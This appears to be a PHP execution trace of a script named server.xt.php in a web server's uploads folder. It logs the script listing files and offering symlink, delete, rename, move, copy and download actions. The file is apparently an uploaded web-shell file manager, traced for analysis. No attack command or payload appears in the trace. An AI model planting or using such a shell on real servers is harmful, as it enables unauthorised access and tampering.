4	293	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	294	0	0.015002	802808	word	1		/var/www/html/uploads/server.xt.php	1367	1	'create_symlink'
5	295	0	0.015016	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create symlink'	2	'UTF-8'
5	295	1	0.015035	803080
5	295	R			'create symlink'
4	294	1	0.015050	802968
4	294	R			'create symlink'
4	296	0	0.015064	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'delete'
5	297	0	0.015077	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	297	1	0.015091	803072
5	297	R			'delete'
4	296	1	0.015105	802960
4	296	R			'delete'
4	298	0	0.015118	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'rename'
5	299	0	0.015131	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'rename'	2	'UTF-8'
5	299	1	0.015145	803072
5	299	R			'rename'
4	298	1	0.015158	802960
4	298	R			'rename'
4	300	0	0.015172	802792	word	1		/var/www/html/uploads/server.xt.php	1367	1	'move'
5	301	0	0.015185	802792	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	301	1	0.015199	803064
5	301	R			'move'
4	300	1	0.015212	802952
4	300	R			'move'
3		A						/var/www/html/uploads/server.xt.php	1249	$i++
4	302	0	0.015236	802744	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	302	1	0.015308	802776
4	302	R			6
3		A						/var/www/html/uploads/server.xt.php	1250	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	303	0	0.015348	802744	date	0		/var/www/html/uploads/server.xt.php	1252	2	'n/j/y H:i:s'	1676253117
4	303	1	0.015380	803072
4	303	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1252	$timestamps = 'mtime: 2/12/23 20:51:57, '
4	304	0	0.015406	802688	date	0		/var/www/html/uploads/server.xt.php	1253	2	'n/j/y H:i:s'	1676253117
4	304	1	0.015436	803016
4	304	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1253	$timestamps .= 'atime: 2/12/23 20:51:57, '
4	305	0	0.015465	802712	date	0		/var/www/html/uploads/server.xt.php	1254	2	'n/j/y H:i:s'	1676253117
4	305	1	0.015495	803040
4	305	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1254	$timestamps .= 'ctime: 2/12/23 20:51:57'
4	306	0	0.015522	802936	html	1		/var/www/html/uploads/server.xt.php	1258	1	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
5	307	0	0.015536	802936	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'	2	NULL
5	307	1	0.015553	803240
5	307	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	306	1	0.015569	803128
4	306	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	308	0	0.015586	802800	urlencode	0		/var/www/html/uploads/server.xt.php	1281	1	'/var/www/html/uploads/data'
4	308	1	0.015599	802896
4	308	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata'
4	309	0	0.015615	802840	html	1		/var/www/html/uploads/server.xt.php	1281	1	'data'
5	310	0	0.015629	802840	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'data'	2	NULL
5	310	1	0.015643	803112
5	310	R			'data'
4	309	1	0.015657	803000
4	309	R			'data'
4	311	0	0.015700	802744	human_filesize	1		/var/www/html/uploads/server.xt.php	1304	1	4096
4		A						/var/www/html/uploads/server.xt.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.xt.php	1155	$n = 0
4		A						/var/www/html/uploads/server.xt.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.xt.php	1158	$n++
5	312	0	0.015769	802744	strpos	0		/var/www/html/uploads/server.xt.php	1161	2	4	'.'
5	312	1	0.015784	802816
5	312	R			FALSE
5	313	0	0.015797	802744	round	0		/var/www/html/uploads/server.xt.php	1161	2	4	3
5	313	1	0.015810	802816
5	313	R			4
4		A						/var/www/html/uploads/server.xt.php	1161	$filesize = 4
5	314	0	0.015837	802744	strpos	0		/var/www/html/uploads/server.xt.php	1163	2	4	'.'
5	314	1	0.015850	803072
5	314	R			FALSE
5	315	0	0.015864	802744	substr	0		/var/www/html/uploads/server.xt.php	1169	3	'kMGTPE'	0	1
5	315	1	0.015877	802840
5	315	R			'k'
4		A						/var/www/html/uploads/server.xt.php	1169	$suffix = 'k'
4	311	1	0.015901	802776
4	311	R			'4 kB'
3		A						/var/www/html/uploads/server.xt.php	1304	$human = ' title="4 kB"'
4	316	0	0.015926	802744	decoct	0		/var/www/html/uploads/server.xt.php	1315	1	16895
4	316	1	0.015939	802816
4	316	R			'40777'
4	317	0	0.015952	802744	function_exists	0		/var/www/html/uploads/server.xt.php	1317	1	'posix_getuid'
4	317	1	0.015965	802784
4	317	R			TRUE
4	318	0	0.015978	802744	posix_getuid	0		/var/www/html/uploads/server.xt.php	1317	0
4	318	1	0.015990	802744
4	318	R			33
3		A						/var/www/html/uploads/server.xt.php	1317	$l = FALSE
4	319	0	0.016013	802744	permission_octal2string	1		/var/www/html/uploads/server.xt.php	1319	1	16895
4		A						/var/www/html/uploads/server.xt.php	970	$type = 'd'
4		A						/var/www/html/uploads/server.xt.php	979	$owner = 'r'
4		A						/var/www/html/uploads/server.xt.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.xt.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.xt.php	987	$group = 'r'
4		A						/var/www/html/uploads/server.xt.php	988	$group .= 'w'
4		A						/var/www/html/uploads/server.xt.php	992	$group .= 'x'
4		A						/var/www/html/uploads/server.xt.php	995	$other = 'r'
4		A						/var/www/html/uploads/server.xt.php	996	$other .= 'w'
4		A						/var/www/html/uploads/server.xt.php	1000	$other .= 'x'
4	319	1	0.016124	802784
4	319	R			'drwxrwxrwx'
4	320	0	0.016138	802784	html	1		/var/www/html/uploads/server.xt.php	1319	1	'drwxrwxrwx'
5	321	0	0.016151	802784	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'drwxrwxrwx'	2	NULL
5	321	1	0.016165	803056
5	321	R			'drwxrwxrwx'
4	320	1	0.016179	802944
4	320	R			'drwxrwxrwx'
4	322	0	0.016193	802744	array_key_exists	0		/var/www/html/uploads/server.xt.php	1324	2	'owner_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	322	1	0.016222	802808
4	322	R			TRUE
4	323	0	0.016235	802744	array_key_exists	0		/var/www/html/uploads/server.xt.php	1330	2	'group_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	323	1	0.016263	802808
4	323	R			TRUE
4	324	0	0.016277	802840	html	1		/var/www/html/uploads/server.xt.php	1339	1	'/var/www/html/uploads/data'
5	325	0	0.016290	802840	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/data'	2	NULL
5	325	1	0.016305	803112
5	325	R			'/var/www/html/uploads/data'
4	324	1	0.016320	803000
4	324	R			'/var/www/html/uploads/data'
3		A						/var/www/html/uploads/server.xt.php	1342	$actions = []
4	326	0	0.016344	802368	function_exists	0		/var/www/html/uploads/server.xt.php	1343	1	'symlink'
4	326	1	0.016357	802408
4	326	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1344	$actions[] = 'create_symlink'
4	327	0	0.016381	802744	dirname	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads/data'
4	327	1	0.016394	802832
4	327	R			'/var/www/html/uploads'
4	328	0	0.016408	802800	is_writable	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads'
4	328	1	0.016425	802840
4	328	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.xt.php	1349	$actions[] = 'move'
4	329	0	0.016469	802744	function_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'exec'
4	329	1	0.016482	802784
4	329	R			TRUE
4	330	0	0.016494	802744	sizeof	0		/var/www/html/uploads/server.xt.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	330	1	0.016515	802776
4	330	R			4
4	331	0	0.016528	802840	str_repeat	0		/var/www/html/uploads/server.xt.php	1363	2	'&nbsp;'	30
4	331	1	0.016542	803128
4	331	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	332	0	0.016557	802808	word	1		/var/www/html/uploads/server.xt.php	1367	1	'create_symlink'
5	333	0	0.016571	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create symlink'	2	'UTF-8'
5	333	1	0.016586	803080
5	333	R			'create symlink'
4	332	1	0.016601	802968
4	332	R			'create symlink'
4	334	0	0.016615	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'delete'
5	335	0	0.016628	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	335	1	0.016642	803072
5	335	R			'delete'
4	334	1	0.016655	802960
4	334	R			'delete'
4	336	0	0.016668	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'rename'
5	337	0	0.016680	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'rename'	2	'UTF-8'
5	337	1	0.016695	803072
5	337	R			'rename'
4	336	1	0.016708	802960
4	336	R			'rename'
4	338	0	0.016721	802792	word	1		/var/www/html/uploads/server.xt.php	1367	1	'move'
5	339	0	0.016733	802792	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	339	1	0.016747	803064
5	339	R			'move'
4	338	1	0.016760	802952
4	338	R			'move'
3		A						/var/www/html/uploads/server.xt.php	1249	$i++
4	340	0	0.016784	802744	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	340	1	0.016855	802776
4	340	R			6
3		A						/var/www/html/uploads/server.xt.php	1250	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	341	0	0.016895	802744	date	0		/var/www/html/uploads/server.xt.php	1252	2	'n/j/y H:i:s'	1676253117
4	341	1	0.016928	803072
4	341	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1252	$timestamps = 'mtime: 2/12/23 20:51:57, '
4	342	0	0.016954	802688	date	0		/var/www/html/uploads/server.xt.php	1253	2	'n/j/y H:i:s'	1676253117
4	342	1	0.016985	803016
4	342	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1253	$timestamps .= 'atime: 2/12/23 20:51:57, '
4	343	0	0.017011	802712	date	0		/var/www/html/uploads/server.xt.php	1254	2	'n/j/y H:i:s'	1676253117
4	343	1	0.017041	803040
4	343	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1254	$timestamps .= 'ctime: 2/12/23 20:51:57'
4	344	0	0.017067	802936	html	1		/var/www/html/uploads/server.xt.php	1258	1	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
5	345	0	0.017081	802936	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'	2	NULL
5	345	1	0.017098	803240
5	345	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	344	1	0.017114	803128
4	344	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	346	0	0.017277	802744	substr	0		/var/www/html/uploads/server.xt.php	1289	3	'.htaccess'	0	1
4	346	1	0.017293	802840
4	346	R			'.'
4	347	0	0.017308	802824	urlencode	0		/var/www/html/uploads/server.xt.php	1296	1	'/var/www/html/uploads/.htaccess'
4	347	1	0.017321	802936
4	347	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.htaccess'
4	348	0	0.017338	802856	html	1		/var/www/html/uploads/server.xt.php	1296	1	'.htaccess'
5	349	0	0.017351	802856	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'.htaccess'	2	NULL
5	349	1	0.017365	803128
5	349	R			'.htaccess'
4	348	1	0.017380	803016
4	348	R			'.htaccess'
3		A						/var/www/html/uploads/server.xt.php	1306	$human = ''
4	350	0	0.017406	802704	decoct	0		/var/www/html/uploads/server.xt.php	1315	1	33188
4	350	1	0.017418	802776
4	350	R			'100644'
4	351	0	0.017435	802704	function_exists	0		/var/www/html/uploads/server.xt.php	1317	1	'posix_getuid'
4	351	1	0.017448	802744
4	351	R			TRUE
4	352	0	0.017461	802704	posix_getuid	0		/var/www/html/uploads/server.xt.php	1317	0
4	352	1	0.017474	802704
4	352	R			33
3		A						/var/www/html/uploads/server.xt.php	1317	$l = FALSE
4	353	0	0.017497	802704	permission_octal2string	1		/var/www/html/uploads/server.xt.php	1319	1	33188
4		A						/var/www/html/uploads/server.xt.php	966	$type = '-'
4		A						/var/www/html/uploads/server.xt.php	979	$owner = 'r'
4		A						/var/www/html/uploads/server.xt.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.xt.php	984	$owner .= '-'
4		A						/var/www/html/uploads/server.xt.php	987	$group = 'r'
4		A						/var/www/html/uploads/server.xt.php	988	$group .= '-'
4		A						/var/www/html/uploads/server.xt.php	992	$group .= '-'
4		A						/var/www/html/uploads/server.xt.php	995	$other = 'r'
4		A						/var/www/html/uploads/server.xt.php	996	$other .= '-'
4		A						/var/www/html/uploads/server.xt.php	1000	$other .= '-'
4	353	1	0.017614	802744
4	353	R			'-rw-r--r--'
4	354	0	0.017628	802744	html	1		/var/www/html/uploads/server.xt.php	1319	1	'-rw-r--r--'
5	355	0	0.017641	802744	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'-rw-r--r--'	2	NULL
5	355	1	0.017656	803016
5	355	R			'-rw-r--r--'
4	354	1	0.017670	802904
4	354	R			'-rw-r--r--'
4	356	0	0.017684	802704	array_key_exists	0		/var/www/html/uploads/server.xt.php	1324	2	'owner_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	356	1	0.017714	802768
4	356	R			TRUE
4	357	0	0.017727	802704	array_key_exists	0		/var/www/html/uploads/server.xt.php	1330	2	'group_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	357	1	0.017755	802768
4	357	R			TRUE
4	358	0	0.017769	802800	html	1		/var/www/html/uploads/server.xt.php	1339	1	'/var/www/html/uploads/.htaccess'
5	359	0	0.017782	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/.htaccess'	2	NULL
5	359	1	0.017797	803072
5	359	R			'/var/www/html/uploads/.htaccess'
4	358	1	0.017812	802960
4	358	R			'/var/www/html/uploads/.htaccess'
3		A						/var/www/html/uploads/server.xt.php	1342	$actions = []
4	360	0	0.017838	802328	function_exists	0		/var/www/html/uploads/server.xt.php	1343	1	'symlink'
4	360	1	0.017851	802368
4	360	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1344	$actions[] = 'create_symlink'
4	361	0	0.017875	802704	dirname	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads/.htaccess'
4	361	1	0.017888	802792
4	361	R			'/var/www/html/uploads'
4	362	0	0.017902	802760	is_writable	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads'
4	362	1	0.017918	802800
4	362	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.xt.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/server.xt.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/server.xt.php	1353	$actions[] = 'download'
4	363	0	0.017983	802704	function_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'exec'
4	363	1	0.017997	802744
4	363	R			TRUE
4	364	0	0.018009	802704	sizeof	0		/var/www/html/uploads/server.xt.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	364	1	0.018028	802736
4	364	R			6
4	365	0	0.018041	802800	str_repeat	0		/var/www/html/uploads/server.xt.php	1363	2	'&nbsp;'	30
4	365	1	0.018054	803088
4	365	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	366	0	0.018070	802768	word	1		/var/www/html/uploads/server.xt.php	1367	1	'create_symlink'
5	367	0	0.018083	802768	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create symlink'	2	'UTF-8'
5	367	1	0.018098	803040
5	367	R			'create symlink'
4	366	1	0.018118	802928
4	366	R			'create symlink'
4	368	0	0.018132	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'delete'
5	369	0	0.018145	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	369	1	0.018159	803032
5	369	R			'delete'
4	368	1	0.018173	802920
4	368	R			'delete'
4	370	0	0.018186	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'rename'
5	371	0	0.018199	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'rename'	2	'UTF-8'
5	371	1	0.018213	803032
5	371	R			'rename'
4	370	1	0.018226	802920
4	370	R			'rename'
4	372	0	0.018240	802752	word	1		/var/www/html/uploads/server.xt.php	1367	1	'move'
5	373	0	0.018252	802752	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	373	1	0.018266	803024
5	373	R			'move'
4	372	1	0.018279	802912
4	372	R			'move'
4	374	0	0.018292	802752	word	1		/var/www/html/uploads/server.xt.php	1367	1	'copy'
5	375	0	0.018305	802752	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'copy'	2	'UTF-8'
5	375	1	0.018319	803024
5	375	R			'copy'
4	374	1	0.018332	802912
4	374	R			'copy'
4	376	0	0.018346	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'download'
5	377	0	0.018358	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'download'	2	'UTF-8'
5	377	1	0.018372	803032
5	377	R			'download'
4	376	1	0.018385	802920
4	376	R			'download'
3		A						/var/www/html/uploads/server.xt.php	1249	$i++
4	378	0	0.018410	802704	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	378	1	0.018481	802736
4	378	R			6
